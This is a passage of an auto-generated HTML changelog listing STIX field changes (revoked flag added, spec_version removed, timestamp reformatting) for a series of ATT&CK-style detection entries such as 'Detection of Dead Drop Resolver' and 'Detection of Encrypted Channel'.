style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0678] Detection of Data Encrypted for Impact</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0660] Detection of Data Manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0713] Detection of Data from Local System</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0617] Detection of Dead Drop Resolver</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0630] Detection of Device Administrator Permissions</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0603] Detection of Device Lockout</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0693] Detection of Disable or Modify Tools</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0710] Detection of Disguise Root/Jailbreak Indicators</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0669] Detection of Domain Generation Algorithms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0618] Detection of Download New Code at Runtime</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0614] Detection of Drive-By Compromise</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0613] Detection of Dynamic Resolution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0641] Detection of Encrypted Channel</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0627] Detection of Endpoint Denial of Service</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0647] Detection of Event Triggered Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0653] Detection of Execution 